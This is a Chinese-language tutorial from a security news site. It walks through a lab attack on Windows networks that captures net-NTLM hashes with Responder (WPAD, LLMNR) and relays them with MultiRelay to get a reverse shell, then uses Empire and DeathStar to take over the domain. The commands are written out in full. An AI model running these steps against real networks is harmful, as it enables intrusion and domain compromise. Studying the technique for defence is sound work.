>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网 | xxx>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网 – xxx
菜单

>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网

三月 17, 2020 - 黑吧安全网

内网渗透-net-NTLM hash的攻击

来源:本站整理 作者:佚名 时间:2020-03-18 TAG: 我要投稿

0x01 前言
记得之前有个知识点还没有去写,虽然比较简单,但是很多文章对突出的重点写的不够详细,所以我搭个环境整理一下,具体一些认证原理、以及中继转发的过程,请查看我的上一篇文章。
 
0x02 中继原理
对于SMB协议,客户端在连接服务端时,默认先使用本机的用户名和密码hash尝试登录,所以可以模拟SMB服务器从而截获其它PC的net-ntlm hash。而作为中继的机器必须要有域管理员权限或本地管理员权限,且被中继的机器要关闭smb签名认证,否则怎么去做中继呢,比如本文案例用域控做中继。
除了中继smb协议,还可以中继LDAP,从域内内收集更多的信息,包括用户、他们的组成员、域计算机和域策略;中继IMAP,Exchange 服务器上的 IMAP 支持 NTLM 身份验证,若Exchange启用 NTLM 身份验证,可以登录用户的邮箱。这些可以用来进一步的扩大危害。
 
0x03 获取net-NTLM hash
中继即让客户端连接到攻击者模拟的SMB,其实最关键的是先拿到net-ntlm hash,若是域管的hash,就可以拿到域内的任意主机权限。NTLM 身份验证被封装在其他协议中,但是无论覆盖的协议是什么,消息都是相同的,比如SMB、HTTP(S)、LDAP、IMAP、SMTP、POP3 和 MSSQL,就是说NTLM 支持多种协议。HTTP 进行身份验证的客户端会在“ Authorization”标头中发送 NTLM 身份验证消息,因此除了中继SMB可以直接登录之外,若是中继MSSQL等,可以转发登录目标的MSSQL。
下面总结几个获取方法:
1.中间人攻击,比如内网做个DNS劫持,如果是全内网劫持,危害是比较大的。
2.WPAD,自动发现协议,利用DNS 查找一个名为 WPAD 的主机名,如果不能通过上面描述的 LLMNR。 Responder开启WPAD后,-F,当目标浏览网站时强制使用NTLM hash认证,而且主机重启时也能抓到NTLM hash。
加-F参数即可开启WPAD抓取 hash,此时用户浏览网站Net-NTLM hash就被获取。
python Responder.py -I eth0 -v -F
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
3.web漏洞,如XSS、文件包含等获取net-NTLM hash。
4.LLMNR,构造不存在的主机名,当主机名无法使用 DNS 解析的主机,则使用本地链路多播名称解析,即LLMNR滥用自动发现协议产生的流量,Windows 代理自动检测 (WPAD) 功能,自动尝试使用 NTLM 身份验证进行身份验证通过中间人攻击获得的流量,比如DNS劫持,重定向到受害者工作站受信任的位置
 
0x04 中继反弹shell
攻击机ip
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
靶机ip
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
受害者ip-域内pc
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
1、攻击机执行 python Responder.py -I eth0 -r -d –w
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
2、sudo python MultiRelay.py -t 192.168.191.189 -u ALL
可以导入列表,这里演示一个攻击目标192.168.191.189,利用Responder的MultiRelay模块获取shell,如果成功,直接反弹192.168.191.189的shell
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
3、靶机执行 net use 192.168.191.190test
用户名密码随意输入,因为就算密码错误了,会调用这台机子自带的hash尝试登录攻击机,被攻击机获取hash,进行中继转发。
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
4、执行之后,发现MultiRelay已经反弹受害机的shell
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
获取shell之后进一步利用,可以dump hash、或加载到meterpreter、 CS,执行一下powershell命令即可。
 
0x05 DeathStar体验
1、启动empire
sudo python empire —rest —username username —password 123456
2、启动Deathstar,ip为攻击机ip,为了接管agent
python3 DeathStar.py -lip 192.168.191.190 -t 100 -u username -p 123456
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网
3、empire生成powershell
Listeners,会发现已经有了一个DeathStar监听
launcher powershell DeathStar,生成powershell代码
>内网渗透-net-NTLM hash的攻击-网络安全-黑吧安全网

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。

上一篇:检测针对手机面部识别的演示攻击(一)返回黑吧安全网首页】【进入黑吧技术论坛
下一篇:分析BSidesSF CTF 2020中Crypto方向题目


Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51